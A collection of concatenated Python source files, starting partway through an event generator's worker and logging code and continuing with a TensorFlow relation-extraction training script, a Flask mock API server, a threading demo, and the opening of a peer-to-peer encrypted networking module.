for i in range(worker_threads):
worker = Thread(target=self._generator_do_work, args=(self.workerQueue, self.loggingQueue, None))
worker.setDaemon(True)
worker.start()
def _create_generator_workers(self, workercount=20):
if self.args.multiprocess:
import multiprocessing
self.workerPool = []
for worker in xrange(workercount):
# builds a list of tuples to use the map function
process = multiprocessing.Process(target=self._proc_worker_do_work, args=(
self.workerQueue,
self.loggingQueue,
self.genconfig,
))
self.workerPool.append(process)
process.start()
else:
pass
def _setup_loggers(self, args=None, config=None):
log_path = getattr(args, "log_path", os.path.join(file_path, 'logs'))
eventgen_main_logger_path = os.path.join(log_path, 'eventgen-main.log')
eventgen_controller_logger_path = os.path.join(log_path, 'eventgen-controller.log')
eventgen_metrics_logger_path = os.path.join(log_path, 'eventgen-metrics.log')
eventgen_error_logger_path = os.path.join(log_path, 'eventgen-errors.log')
eventgen_server_logger_path = os.path.join(log_path, 'eventgen-server.log')
eventgen_httpevent_logger_path = os.path.join(log_path, 'eventgen-httpevent.log')
if not config:
log_format = '%(asctime)s %(name)-15s %(levelname)-8s %(processName)-10s %(message)s'
date_format = '%Y-%m-%d %H:%M:%S'
# Set up formatter
detailed_formatter = logging.Formatter(log_format, datefmt=date_format)
json_formatter = JSONFormatter(log_format, datefmt=date_format)
# Set up handlers
console_handler = logging.StreamHandler()
console_handler.setFormatter(detailed_formatter)
console_handler.setLevel(logging.DEBUG)
file_handler = logging.handlers.RotatingFileHandler(eventgen_main_logger_path, maxBytes=2500000,
backupCount=20)
file_handler.setFormatter(detailed_formatter)
file_handler.setLevel(logging.DEBUG)
eventgen_controller_file_handler = logging.handlers.RotatingFileHandler(eventgen_controller_logger_path,
maxBytes=2500000, backupCount=20)
eventgen_controller_file_handler.setFormatter(detailed_formatter)
eventgen_controller_file_handler.setLevel(logging.DEBUG)
error_file_handler = logging.handlers.RotatingFileHandler(eventgen_error_logger_path, maxBytes=2500000,
backupCount=20)
error_file_handler.setFormatter(detailed_formatter)
error_file_handler.setLevel(logging.ERROR)
metrics_file_handler = logging.handlers.RotatingFileHandler(eventgen_metrics_logger_path, maxBytes=2500000,
backupCount=20)
metrics_file_handler.setFormatter(json_formatter)
metrics_file_handler.setLevel(logging.INFO)
server_file_handler = logging.handlers.RotatingFileHandler(eventgen_server_logger_path, maxBytes=2500000,
backupCount=10)
server_file_handler.setFormatter(json_formatter)
server_file_handler.setLevel(logging.INFO)
httpevent_file_handler = logging.handlers.RotatingFileHandler(eventgen_httpevent_logger_path, maxBytes=2500000,
backupCount=10)
httpevent_file_handler.setFormatter(detailed_formatter)
httpevent_file_handler.setLevel(logging.INFO)
# Configure eventgen logger
logger = logging.getLogger('eventgen')
logger.setLevel(self.args.verbosity or logging.ERROR)
logger.propagate = False
logger.handlers = []
if args and not args.modinput_mode:
logger.addHandler(console_handler)
logger.addHandler(file_handler)
logger.addHandler(error_file_handler)
# Configure eventgen listener
logger = logging.getLogger('eventgen_controller')
logger.setLevel(self.args.verbosity or logging.ERROR)
logger.propagate = False
logger.handlers = []
logger.addHandler(eventgen_controller_file_handler)
logger.addHandler(error_file_handler)
logger.addHandler(console_handler)
# Configure eventgen mertics logger
logger = logging.getLogger('eventgen_metrics')
logger.setLevel(logging.INFO)
logger.propagate = False
logger.handlers = []
logger.addHandler(metrics_file_handler)
# Configure eventgen server logger
logger = logging.getLogger('eventgen_server')
logger.setLevel(logging.INFO)
logger.propagate = False
logger.handlers = []
logger.addHandler(server_file_handler)
logger.addHandler(console_handler)
# Configure httpeventout logger
logger = logging.getLogger('eventgen_httpeventout')
logger.setLevel(logging.INFO)
logger.propagate = False
logger.handlers = []
logger.addHandler(httpevent_file_handler)
else:
self.logger_config = config
logging.config.dictConfig(self.logger_config)
# We need to have debugv from the olderversions of eventgen.
DEBUG_LEVELV_NUM = 9
logging.addLevelName(DEBUG_LEVELV_NUM, "DEBUGV")
def debugv(self, message, *args, **kws):
# Yes, logger takes its '*args' as 'args'.
if self.isEnabledFor(DEBUG_LEVELV_NUM):
self._log(DEBUG_LEVELV_NUM, message, args, **kws)
logging.Logger.debugv = debugv
self.logger = logging.getLogger('eventgen')
self.loggingQueue = None
def _worker_do_work(self, work_queue, logging_queue):
while not self.stopping:
try:
item = work_queue.get(timeout=10)
startTime = time.time()
item.run()
totalTime = time.time() - startTime
if totalTime > self.config.interval and self.config.end != 1:
self.logger.warning("work took longer than current interval, queue/threading throughput limitation")
work_queue.task_done()
except Empty:
pass
except Exception as e:
self.logger.exception(str(e))
raise e
def _generator_do_work(self, work_queue, logging_queue, output_counter=None):
while not self.stopping:
try:
item = work_queue.get(timeout=10)
startTime = time.time()
item.run(output_counter=output_counter)
totalTime = time.time() - startTime
if totalTime > self.config.interval and item._sample.end != 1:
self.logger.warning("work took longer than current interval, queue/threading throughput limitation")
work_queue.task_done()
except Empty:
pass
except Exception as e:
self.logger.exception(str(e))
raise e
@staticmethod
def _proc_worker_do_work(work_queue, logging_queue, config):
genconfig = config
stopping = genconfig['stopping']
root = logging.getLogger()
root.setLevel(logging.DEBUG)
if logging_queue is not None:
# TODO https://github.com/splunk/eventgen/issues/217
qh = logutils.queue.QueueHandler(logging_queue)
root.addHandler(qh)
else:
root.addHandler(logging.StreamHandler())
while not stopping:
try:
root.info("Checking for work")
item = work_queue.get(timeout=10)
item.logger = root
item.config._setup_logging()
item._out.updateConfig(item.config)
item._out._setup_logging()
item.run()
work_queue.task_done()
stopping = genconfig['stopping']
item.logger.debug("Current Worker Stopping: {0}".format(stopping))
except Empty:
stopping = genconfig['stopping']
except Exception as e:
root.exception(e)
raise e
else:
root.info("Stopping Process")
sys.exit(0)
def logger_thread(self, loggingQueue):
while not self.stopping:
try:
record = loggingQueue.get(timeout=10)
logger = logging.getLogger(record.name)
logger.handle(record)
loggingQueue.task_done()
except Empty:
pass
except Exception as e:
self.logger.exception(str(e))
raise e
def _initializePlugins(self, dirname, plugins, plugintype, name=None):
"""Load a python module dynamically and add to internal dictionary of plugins (only accessed by getPlugin)"""
ret = []
syspathset = set(sys.path)
dirname = os.path.abspath(dirname)
self.logger.debug("looking for plugin(s) in {}".format(dirname))
if not os.path.isdir(dirname):
self.logger.debug("directory {} does not exist ... moving on".format(dirname))
return ret
# Include all plugin directories in sys.path for includes
if dirname not in sys.path:
syspathset.add(dirname)
sys.path = list(syspathset)
# Loop through all files in passed dirname looking for plugins
for filename in os.listdir(dirname):
filename = dirname + os.sep + filename
# If the file exists
if os.path.isfile(filename):
# Split file into a base name plus extension
basename = os.path.basename(filename)
base, extension = os.path.splitext(basename)
# If we're a python file and we don't start with _
# if extension == ".py" and not basename.startswith("_"):
# APPPERF-263: If name param is supplied, only attempt to load
# {name}.py from {app}/bin directory
if extension == ".py" and ((name is None and not basename.startswith("_")) or base == name):
self.logger.debug("Searching for plugin in file '%s'" % filename)
try:
# Import the module
# module = imp.load_source(base, filename)
mod_name, mod_path, mod_desc = imp.find_module(base, [dirname])
# TODO: Probably need to adjust module.load() to be added later so this can be pickled.
module = imp.load_module(base, mod_name, mod_path, mod_desc)
plugin = module.load()
# set plugin to something like output.file or generator.default
pluginname = plugintype + '.' + base
# self.logger.debugv("Filename: %s os.sep: %s pluginname: %s" % (filename, os.sep, pluginname))
plugins[pluginname] = plugin
# Return is used to determine valid configs, so only return the base name of the plugin
ret.append(base)
self.logger.debug("Loading module '%s' from '%s'" % (pluginname, basename))
# 12/3/13 If we haven't loaded a plugin right or we haven't initialized all the variables
# in the plugin, we will get an exception and the plan is to not handle it
if 'validSettings' in dir(plugin):
self.config._validSettings.extend(plugin.validSettings)
if 'defaultableSettings' in dir(plugin):
self.config._defaultableSettings.extend(plugin.defaultableSettings)
if 'intSettings' in dir(plugin):
self.config._intSettings.extend(plugin.intSettings)
if 'floatSettings' in dir(plugin):
self.config._floatSettings.extend(plugin.floatSettings)
if 'boolSettings' in dir(plugin):
self.config._boolSettings.extend(plugin.boolSettings)
if 'jsonSettings' in dir(plugin):
self.config._jsonSettings.extend(plugin.jsonSettings)
if 'complexSettings' in dir(plugin):
self.config._complexSettings.update(plugin.complexSettings)
except ValueError:
self.logger.error("Error loading plugin '%s' of type '%s'" % (base, plugintype))
except ImportError as ie:
self.logger.warn("Could not load plugin: %s, skipping" % mod_name.name)
self.logger.exception(ie)
except Exception as e:
self.logger.exception(str(e))
raise e
return ret
def start(self, join_after_start=True):
self.stopping = False
self.started = True
self.config.stopping = False
self.completed = False
if len(self.config.samples) <= 0:
self.logger.info("No samples found. Exiting.")
for s in self.config.samples:
if s.interval > 0 or s.mode == 'replay' or s.end != "0":
self.logger.info("Creating timer object for sample '%s' in app '%s'" % (s.name, s.app))
# This is where the timer is finally sent to a queue to be processed. Needs to move to this object.
try:
t = Timer(1.0, sample=s, config=self.config, genqueue=self.workerQueue,
outputqueue=self.outputQueue, loggingqueue=self.loggingQueue)
except PluginNotLoaded as pnl:
self._load_custom_plugins(pnl)
t = Timer(1.0, sample=s, config=self.config, genqueue=self.workerQueue,
outputqueue=self.outputQueue, loggingqueue=self.loggingQueue)
except Exception as e:
raise e
self.sampleQueue.put(t)
if join_after_start:
self.logger.info("All timers started, joining queue until it's empty.")
self.join_process()
def join_process(self):
'''
This method will attach the current object to the queues existing for generation and will call stop after all
generation is complete. If the queue never finishes, this will lock the main process to the child indefinitely.
:return:
'''
try:
while not self.sampleQueue.empty() or self.sampleQueue.unfinished_tasks > 0 or not self.workerQueue.empty():
time.sleep(5)
self.logger.info("All timers have finished, signalling workers to exit.")
self.stop()
except Exception as e:
self.logger.exception(str(e))
raise e
def stop(self):
# empty the sample queue:
self.config.stopping = True
self.stopping = True
self.logger.info("All timers exited, joining generation queue until it's empty.")
self.workerQueue.join()
# if we're in multiprocess, make sure we don't add more generators after the timers stopped.
if self.args.multiprocess:
self.genconfig["stopping"] = True
for worker in self.workerPool:
count = 0
# We wait for a minute until terminating the worker
while worker.exitcode is None and count != 20:
if count == 30:
self.logger.info("Terminating worker {0}".format(worker._name))
worker.terminate()
count = 0
break
self.logger.info("Worker {0} still working, waiting for it to finish.".format(worker._name))
time.sleep(2)
count += 1
self.logger.info("All generators working/exited, joining output queue until it's empty.")
self.outputQueue.join()
self.logger.info("All items fully processed. Cleaning up internal processes.")
self.started = False
self.stopping = False
def reload_conf(self, configfile):
'''
This method will allow a user to supply a new .conf file for generation and reload the sample files.
:param configfile:
:return:
'''
self._load_config(configfile=configfile)
self.logger.debug("Config File Loading Complete.")
def check_running(self):
'''
:return: if eventgen is running, return True else False
'''
if hasattr(self, "outputQueue") and hasattr(self, "sampleQueue") and hasattr(self, "workerQueue"):
# If all queues are not empty, eventgen is running.
# If all queues are empty and all tasks are finished, eventgen is not running.
# If all queues are empty and there is an unfinished task, eventgen is running.
if self.outputQueue.empty() and self.sampleQueue.empty() and self.workerQueue.empty() \
and self.sampleQueue.unfinished_tasks <= 0 \
and self.outputQueue.unfinished_tasks <= 0 \
and self.workerQueue.unfinished_tasks <= 0:
self.logger.info("Queues are all empty and there are no pending tasks")
return self.started
else:
return True
return False
def check_done(self):
'''
:return: if eventgen jobs are finished, return True else False
'''
return self.sampleQueue.empty() and self.sampleQueue.unfinished_tasks <= 0 and self.workerQueue.empty() and self.workerQueue.unfinished_tasks <= 0
|
train_ug_pretrain.py
|
import tensorflow as tf
import numpy as np
import time
import datetime
import os
import network_pretrain_rank as network
import network_pretrain as network_pre
import json
from sklearn.metrics import average_precision_score
import sys
import ctypes
import threading
from kg_dataset_transe import KnowledgeGraph
export_path = "../nyt10_part1/"
export_path_g = "../nyt10_part1/"
export_path_l = "../nyt10_part2/"
word_vec = np.load(export_path + 'vec.npy')
KG = KnowledgeGraph(export_path)
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_float('nbatch_kg', 200,'entity numbers used each training time')
tf.app.flags.DEFINE_float('margin',1.0,'entity numbers used each training time')
tf.app.flags.DEFINE_float('learning_rate_kg',0.001,'learning rate for kg')
tf.app.flags.DEFINE_integer('rel_total', 1376,'total of relations')
tf.app.flags.DEFINE_integer('katt_flag', 13, 'type of attention')
tf.app.flags.DEFINE_string('model', 'cnn', 'neural models to encode sentences')
tf.app.flags.DEFINE_integer('max_length', 120,'maximum of number of words in one sentence')
tf.app.flags.DEFINE_integer('pos_num', 120 * 2 + 1,'number of position embedding vectors')
tf.app.flags.DEFINE_integer('num_classes', 58,'maximum of relations')
tf.app.flags.DEFINE_integer('hidden_size', 230,'hidden feature size')
tf.app.flags.DEFINE_integer('pos_size', 5,'position embedding size')
#tf.app.flags.DEFINE_integer('max_epoch', 150,'maximum of training epochs')
tf.app.flags.DEFINE_integer('max_epoch', 2,'maximum of training epochs')
tf.app.flags.DEFINE_integer('max_epoch_pre', 1,'maximum of training epochs for pretrain')
tf.app.flags.DEFINE_integer('batch_size', 160,'entity numbers used each training time')
tf.app.flags.DEFINE_float('learning_rate',0.05,'learning rate for nn')
tf.app.flags.DEFINE_float('weight_decay',0.00001,'weight_decay')
tf.app.flags.DEFINE_float('keep_prob',0.5,'dropout rate')
tf.app.flags.DEFINE_string('model_dir','./model/','path to store model')
tf.app.flags.DEFINE_string('summary_dir','./summary','path to store summary_dir')
def complexity_features(array):
return np.array([[np.count_nonzero(ele), np.unique(ele).size] for ele in array]).astype(np.float32)
def MakeSummary(name, value):
"""Creates a tf.Summary proto with the given name and value."""
summary = tf.Summary()
val = summary.value.add()
val.tag = str(name)
val.simple_value = float(value)
return summary
def make_shape(array,last_dim):
output = []
for i in array:
for j in i:
output.append(j)
output = np.array(output)
if np.shape(output)[-1]==last_dim:
return output
else:
print 'Make Shape Error!'
def main_pretrain(_):
word_vec = np.load(export_path + 'vec.npy')
instance_triple = np.load(export_path + 'train_instance_triple.npy')
instance_scope = np.load(export_path + 'train_instance_scope.npy')
instance_scope_path = np.load(export_path_l + 'train_instance_scope_kg.npy')
instance_scope_path3 = np.load(export_path_l + 'train_instance_scope_tx.npy')
instance_scope_path4 = np.load(export_path_l + 'train_instance_scope_ug.npy')
train_len = np.load(export_path + 'train_len.npy')
train_label = np.load(export_path + 'train_label.npy')
train_word = np.load(export_path + 'train_word.npy')
train_pos1 = np.load(export_path + 'train_pos1.npy')
train_pos2 = np.load(export_path + 'train_pos2.npy')
train_word_cross = np.load(export_path_l + 'train_word_cross_kg.npy')
train_pos1_cross = np.load(export_path_l + 'train_pos1_cross_kg.npy')
train_pos2_cross = np.load(export_path_l + 'train_pos2_cross_kg.npy')
train_word_cross3 = np.load(export_path_l + 'train_word_cross_tx.npy')
train_pos1_cross3 = np.load(export_path_l + 'train_pos1_cross_tx.npy')
train_pos2_cross3 = np.load(export_path_l + 'train_pos2_cross_tx.npy')
train_word_cross4 = np.load(export_path_l + 'train_word_cross_ug.npy')
train_pos1_cross4 = np.load(export_path_l + 'train_pos1_cross_ug.npy')
train_pos2_cross4 = np.load(export_path_l + 'train_pos2_cross_ug.npy')
train_mask = np.load(export_path + 'train_mask.npy')
train_head = np.load(export_path + 'train_head.npy')
train_tail = np.load(export_path + 'train_tail.npy')
reltot = {}
for index, i in enumerate(train_label):
if not i in reltot:
reltot[i] = 1.0
else:
reltot[i] += 1.0
for i in reltot:
reltot[i] = 1/(reltot[i] ** (0.05))
print 'building network...'
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
model = network_pre.CNN(is_training = True, word_embeddings = word_vec)
global_step = tf.Variable(0,name='global_step',trainable=False)
global_step_kg = tf.Variable(0,name='global_step_kg',trainable=False)
tf.summary.scalar('learning_rate', FLAGS.learning_rate)
tf.summary.scalar('learning_rate_kg', FLAGS.learning_rate_kg)
optimizer = tf.train.GradientDescentOptimizer(FLAGS.learning_rate)
grads_and_vars = optimizer.compute_gradients(model.loss)
train_op = optimizer.apply_gradients(grads_and_vars, global_step = global_step)
optimizer_kg = tf.train.GradientDescentOptimizer(FLAGS.learning_rate_kg)
grads_and_vars_kg = optimizer_kg.compute_gradients(model.loss_kg)
train_op_kg = optimizer_kg.apply_gradients(grads_and_vars_kg, global_step = global_step_kg)
merged_summary = tf.summary.merge_all()
summary_writer = tf.summary.FileWriter(FLAGS.summary_dir, sess.graph)
sess.run(tf.global_variables_initializer())
saver = tf.train.Saver(max_to_keep=None)
batch_size = int(KG.n_triplet / FLAGS.nbatch_kg)
def train_kg(coord):
def train_step_kg(pos_h_batch, pos_t_batch, pos_r_batch, neg_h_batch, neg_t_batch, neg_r_batch):
feed_dict = {
model.pos_h: pos_h_batch,
model.pos_t: pos_t_batch,
model.pos_r: pos_r_batch,
model.neg_h: neg_h_batch,
model.neg_t: neg_t_batch,
model.neg_r: neg_r_batch
}
_, step, loss = sess.run(
[train_op_kg, global_step_kg, model.loss_kg], feed_dict)
return loss
batch_size = int(KG.n_triplet / FLAGS.nbatch_kg)
times_kg = 0
while not coord.should_stop():
times_kg += 1
res = 0.0
pos_batch_gen = KG.next_pos_batch(batch_size)
neg_batch_gen = KG.next_neg_batch(batch_size)
for batchi in range(int(FLAGS.nbatch_kg)):
pos_batch = next(pos_batch_gen)
neg_batch = next(neg_batch_gen)
ph = pos_batch[:, 0]
pt = pos_batch[:, 1]
pr = pos_batch[:, 2]
nh = neg_batch[:, 0]
nt = neg_batch[:, 1]
nr = neg_batch[:, 2]
res += train_step_kg(ph, pt, pr, nh, nt, nr)
time_str = datetime.datetime.now().isoformat()
print "batch %d time %s | loss : %f" % (times_kg, time_str, res)
def train_nn(coord):
def train_step(head, tail, word, pos1, pos2, mask, leng, label_index, label, scope, weights,
word_cr, pos1_cr, pos2_cr, scope_path, head_path, tail_path):
feed_dict = {
model.head_index: head,
model.tail_index: tail,
model.head_index_path: head_path,
model.tail_index_path: tail_path,
model.word: word,
model.pos1: pos1,
model.pos2: pos2,
model.word_cross: word_cr,
model.pos1_cross: pos1_cr,
model.pos2_cross: pos2_cr,
model.mask: mask,
model.len : leng,
model.label_index: label_index,
model.label: label,
model.scope: scope,
model.scope_path: scope_path,
model.keep_prob: FLAGS.keep_prob,
model.weights: weights
}
_, step, loss, summary, output, correct_predictions = sess.run([train_op, global_step, model.loss, merged_summary, model.output, model.correct_predictions], feed_dict)
summary_writer.add_summary(summary, step)
return output, loss, correct_predictions
stack_output = []
stack_label = []
stack_ce_loss = []
train_order = range(len(instance_triple))
save_epoch = 2
eval_step = 300
for one_epoch in range(FLAGS.max_epoch_pre):
print('pretrain epoch '+str(one_epoch+1)+' starts!')
np.random.shuffle(train_order)
s1 = 0.0
s2 = 0.0
tot1 = 0.0
tot2 = 1.0
losstot = 0.0
for i in range(int(len(train_order)/float(FLAGS.batch_size))):
#for i in range(50):
input_scope = np.take(instance_scope, train_order[i * FLAGS.batch_size:(i+1)*FLAGS.batch_size], axis=0)
input_scope_path = np.take(instance_scope_path, train_order[i * FLAGS.batch_size:(i+1)*FLAGS.batch_size], axis=0)
input_scope_path3 = np.take(instance_scope_path3, train_order[i * FLAGS.batch_size:(i+1)*FLAGS.batch_size], axis=0)
input_scope_path4 = np.take(instance_scope_path4, train_order[i * FLAGS.batch_size:(i+1)*FLAGS.batch_size], axis=0)
index = []
scope = [0]
index_path = []
index_path3 = []
index_path4 = []
scope_path = [0]
scope_path3 = [0]
scope_path4 = [0]
label = []
weights = []
train_head_path = []
train_tail_path = []
train_head_path3 = []
train_tail_path3 = []
train_head_path4 = []
train_tail_path4 = []
for num, num_path, num_path3, num_path4 in zip(input_scope, input_scope_path, input_scope_path3, input_scope_path4):
index = index + range(num[0], num[1] + 1)
label.append(train_label[num[0]])
scope.append(scope[len(scope)-1] + num[1] - num[0] + 1)
weights.append(reltot[train_label[num[0]]])
index_path = index_path + range(num_path[0], num_path[1] + 1)
scope_path.append(scope_path[len(scope_path)-1] + num_path[1] - num_path[0] + 1)
index_path3 = index_path3 + range(num_path3[0], num_path3[1] + 1)
scope_path3.append(scope_path3[len(scope_path3)-1] + num_path3[1] - num_path3[0] + 1)
index_path4 = index_path4 + range(num_path4[0], num_path4[1] + 1)
scope_path4.append(scope_path4[len(scope_path4)-1] + num_path4[1] - num_path4[0] + 1)
train_head_path += [train_head[num[0]]]*len(range(num_path[0], num_path[1] + 1))
train_tail_path += [train_tail[num[0]]]*len(range(num_path[0], num_path[1] + 1))
train_head_path3 += [train_head[num[0]]]*len(range(num_path3[0], num_path3[1] + 1))
train_tail_path3 += [train_tail[num[0]]]*len(range(num_path3[0], num_path3[1] + 1))
train_head_path4 += [train_head[num[0]]]*len(range(num_path4[0], num_path4[1] + 1))
train_tail_path4 += [train_tail[num[0]]]*len(range(num_path4[0], num_path4[1] + 1))
label_ = np.zeros((FLAGS.batch_size, FLAGS.num_classes))
label_[np.arange(FLAGS.batch_size), label] = 1
output, loss, correct_predictions = train_step(train_head[index], train_tail[index], train_word[index,:], train_pos1[index,:], train_pos2[index,:],
train_mask[index,:], train_len[index],train_label[index], label_, np.array(scope), weights,
train_word_cross3[index_path3,:], train_pos1_cross3[index_path3,:], train_pos2_cross3[index_path3,:],
np.array(scope_path3), train_head_path3, train_tail_path3)
output, loss, correct_predictions = train_step(train_head[index], train_tail[index], train_word[index,:], train_pos1[index,:], train_pos2[index,:],
train_mask[index,:], train_len[index],train_label[index], label_, np.array(scope), weights,
train_word_cross4[index_path4,:], train_pos1_cross4[index_path4,:], train_pos2_cross4[index_path4,:],
np.array(scope_path4), train_head_path4, train_tail_path4)
output, loss, correct_predictions = train_step(train_head[index], train_tail[index], train_word[index,:], train_pos1[index,:], train_pos2[index,:],
train_mask[index,:], train_len[index],train_label[index], label_, np.array(scope), weights,
train_word_cross[index_path,:], train_pos1_cross[index_path,:], train_pos2_cross[index_path,:],
np.array(scope_path), train_head_path, train_tail_path)
num = 0
s = 0
losstot += loss
for num in correct_predictions:
if label[s] == 0:
tot1 += 1.0
if num:
s1+= 1.0
else:
tot2 += 1.0
if num:
s2 += 1.0
s = s + 1
time_str = datetime.datetime.now().isoformat()
print "pretrain epoch %d step %d time %s | loss : %f, not NA accuracy: %f" % (one_epoch, i, time_str, loss, s2 / tot2)
current_step = tf.train.global_step(sess, global_step)
if (one_epoch + 1) % save_epoch == 0 and (one_epoch + 1) >= FLAGS.max_epoch_pre:
print 'epoch '+str(one_epoch+1)+' has finished'
print 'saving model...'
path = saver.save(sess,FLAGS.model_dir+'pretrain_' + str(FLAGS.max_epoch_pre))
print 'have savde model to '+path
coord.request_stop()
coord = tf.train.Coordinator()
threads = []
threads.append(threading.Thread(target=train_kg, args=(coord,)))
threads.append(threading.Thread(target=train_nn, args=(coord,)))
for t in threads: t.start()
coord.join(threads)
if __name__ == "__main__":
tf.app.run(main_pretrain)
|
snappiserver.py
|
from flask import Flask, request, Response
import threading
import json
import time
import snappi
app = Flask(__name__)
CONFIG = None
@app.route('/config', methods=['POST'])
def set_config():
global CONFIG
config = snappi.api().config()
config.deserialize(request.data.decode('utf-8'))
test = config.options.port_options.location_preemption
if test is not None and isinstance(test, bool) is False:
return Response(status=590,
response=json.dumps({'detail': 'invalid data type'}),
headers={'Content-Type': 'application/json'})
else:
CONFIG = config
return Response(status=200)
@app.route('/config', methods=['GET'])
def get_config():
global CONFIG
return Response(CONFIG.serialize() if CONFIG is not None else '{}',
mimetype='application/json',
status=200)
@app.route('/control/transmit', methods=['POST'])
def set_transmit_state():
global CONFIG
return Response(status=200)
@app.route('/results/metrics', methods=['POST'])
def get_metrics():
global CONFIG
api = snappi.api()
metrics_request = api.metrics_request()
metrics_request.deserialize(request.data.decode('utf-8'))
metrics_response = api.metrics_response()
if metrics_request.choice == 'port':
for port in CONFIG.ports:
metrics_response.port_metrics.metric(
name=port.name, frames_tx=10000, frames_rx=10000
)
elif metrics_request.choice == 'flow':
for flow in CONFIG.flows:
metrics_response.flow_metrics.metric(
name=flow.name, frames_tx=10000, frames_rx=10000
)
return Response(metrics_response.serialize(),
mimetype='application/json',
status=200)
@app.after_request
def after_request(resp):
print(request.method, request.url, ' -> ', resp.status)
return resp
def web_server():
app.run(port=80, debug=True, use_reloader=False)
class SnappiServer(object):
def __init__(self):
self._CONFIG = None
def start(self):
self._web_server_thread = threading.Thread(target=web_server)
self._web_server_thread.setDaemon(True)
self._web_server_thread.start()
self._wait_until_ready()
return self
def _wait_until_ready(self):
api = snappi.api(location='http://127.0.0.1:80')
while True:
try:
api.get_config()
break
except Exception:
pass
time.sleep(.1)
|
threadDemo.py
|
import threading, time
print('Start of program.')
def takeANap(): #defines function for use in a new thread
time.sleep(5)
print('Wake up!')
threadObj = threading.Thread(target=takeANap) #calls function in new thread.
threadObj.start()
print('End of program!')
|
network.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2020 tecnovert
# Distributed under the MIT software license, see the accompanying
# file LICENSE or http://www.opensource.org/licenses/mit-license.php.
'''
Message 2 bytes msg_class, 4 bytes length, [ 2 bytes msg_type, payload ]
Handshake procedure:
node0 connecting to node1
node0 send_handshake
node1 process_handshake
node1 send_ping - With a version field
node0 recv_ping
Both nodes are initialised
XChaCha20_Poly1305 mac is 16bytes
'''
import time
import queue
import random
import select
import socket
import struct
import hashlib
import logging
import secrets
import threading
import traceback
from enum import IntEnum, auto
from collections import OrderedDict
from Crypto.Cipher import ChaCha20_Poly1305 # TODO: Add to libsecp256k1/coincurve fork
from coincurve.keys import PrivateKey, PublicKey
from basicswap.contrib.rfc6979 import (
rfc6979_hmac_sha256_initialize,
rfc6979_hmac_sha256_generate)
START_TOKEN = 0xabcd
MSG_START_TOKEN = struct.pack('>H', START_TOKEN)
MSG_MAX_SIZE = 0x200000 # 2MB
MSG_HEADER_LEN = 8
MAX_SEEN_EPHEM_KEYS = 1000
TIMESTAMP_LEEWAY = 8
class NetMessageTypes(IntEnum):
HANDSHAKE = auto()
PING = auto()
PONG = auto()
DATA = auto()
ONION_PACKET = auto()
@classmethod
def has_value(cls, value):
return value in cls._value2member_map_
'''
class NetMessage:
def __init__(self):
self._msg_class = None # 2 bytes
self._len = None # 4 bytes
self._msg_type = None # 2 bytes
'''
# Ensure handshake keys are not reused by including the time in the msg, mac and key hash
# Verify timestamp is not too old
# Add keys to db to catch concurrent attempts, records can be cleared periodically, the timestamp should catch older replay attempts
class MsgHandshake:
__slots__ = ('_timestamp', '_ephem_pk', '_ct', '_mac')
def __init__(self):
pass
def encode_aad(self): # Additional Authenticated Data
return struct.pack('>H', NetMessageTypes.HANDSHAKE) + \
struct.pack('>Q', self._timestamp) + \
self._ephem_pk
def encode(self):
return self.encode_aad() + self._ct + self._mac
def decode(self, msg_mv):
o = 2
self._timestamp = struct.unpack('>Q', msg_mv[o: o + 8])[0]
o += 8
self._ephem_pk = bytes(msg_mv[o: o + 33])
o += 33
self._ct = bytes(msg_mv[o: -16])
self._mac = bytes(msg_mv[-16:])
class Peer:
__slots__ = (
'_mx', '_pubkey', '_address', '_socket', '_version', '_ready', '_incoming',
'_connected_at', '_last_received_at', '_bytes_sent', '_bytes_received',
'_receiving_length', '_receiving_buffer', '_recv_messages', '_misbehaving_score',
'_ke', '_km', '_dir', '_sent_nonce', '_recv_nonce', '_last_handshake_at',
'_ping_nonce', '_last_ping_at', '_last_ping_rtt')
def __init__(self, address, socket, pubkey):
self._mx = threading.Lock()
self._pubkey = pubkey
self._address = address
self._socket = socket
self._version = None
self._ready = False # True when handshake is complete
self._incoming = False
self._connected_at = time.time()
self._last_received_at = 0
self._last_handshake_at = 0
self._bytes_sent = 0
self._bytes_received = 0
self._receiving_length = 0
self._receiving_buffer = None
self._recv_messages = queue.Queue() # Built in mutex
self._misbehaving_score = 0 # TODO: Must be persistent - save to db
self._ping_nonce = 0
self._last_ping_at = 0 # ms
self._last_ping_rtt = 0 # ms
def close(self):
self._socket.close()
def listen_thread(cls):
timeout = 1.0
max_bytes = 0x10000
while cls._running:
# logging.info('[rm] network loop %d', cls._running)
readable, writable, errored = select.select(cls._read_sockets, cls._write_sockets, cls._error_sockets, timeout)
cls._mx.acquire()
try:
disconnected_peers = []
for s in readable:
if s == cls._socket:
peer_socket, address = cls._socket.accept()
logging.info('Connection from %s', address)
new_peer = Peer(address, peer_socket, None)
new_peer._incoming = True
cls._peers.append(new_peer)
cls._error_sockets.append(peer_socket)
cls._read_sockets.append(peer_socket)
else:
for peer in cls._peers:
if peer._socket == s:
try:
bytes_recv = s.recv(max_bytes, socket.MSG_DONTWAIT)
except socket.error as se:
if se.args[0] not in (socket.EWOULDBLOCK, ):
logging.error('Receive error %s', str(se))
disconnected_peers.append(peer)
continue
except Exception as e:
logging.error('Receive error %s', str(e))
disconnected_peers.append(peer)
continue
if len(bytes_recv) < 1:
disconnected_peers.append(peer)
continue
cls.receive_bytes(peer, bytes_recv)
for s in errored:
logging.warning('Socket error')
for peer in disconnected_peers:
cls.disconnect(peer)
finally:
cls._mx.release()
def msg_thread(cls):
timeout = 0.1
while cls._running:
processed = False
with cls._mx:
for peer in cls._peers:
try:
now_us = time.time_ns() // 1000
if peer._ready is True:
if now_us - peer._last_ping_at >= 5000000: # 5 seconds TODO: Make variable
cls.send_ping(peer)
msg = peer._recv_messages.get(False)
cls.process_message(peer, msg)
processed = True
except queue.Empty:
pass
except Exception as e:
logging.warning('process message error %s', str(e))
if cls._sc.debug:
logging.error(traceback.format_exc())
if processed is False:
time.sleep(timeout)
class Network:
__slots__ = (
'_p2p_host', '_p2p_port', '_network_key', '_network_pubkey',
'_sc', '_peers', '_max_connections', '_running', '_network_thread', '_msg_thread',
'_mx', '_socket', '_read_sockets', '_write_sockets', '_error_sockets', '_csprng', '_seen_ephem_keys')
def __init__(self, p2p_host, p2p_port, network_key, swap_client):
self._p2p_host = p2p_host
self._p2p_port = p2p_port
self._network_key = network_key
self._network_pubkey = PublicKey.from_secret(network_key).format()
self._sc = swap_client
self._peers = []
self._max_connections = 10
